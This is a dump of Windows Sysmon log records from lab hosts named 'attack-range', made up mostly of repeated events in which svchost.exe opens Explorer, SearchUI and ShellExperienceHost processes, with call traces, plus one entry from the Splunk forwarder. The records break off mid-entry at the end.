23542300x8000000000000000223395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:32.974{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F7E3583BA6562100D43CE5BABF4931B,SHA256=08FCC6AFC5500858346A06535E2F3872D9BF329B9264A3EF9D9E876B1BD747C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.758{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.757{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:32.756{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 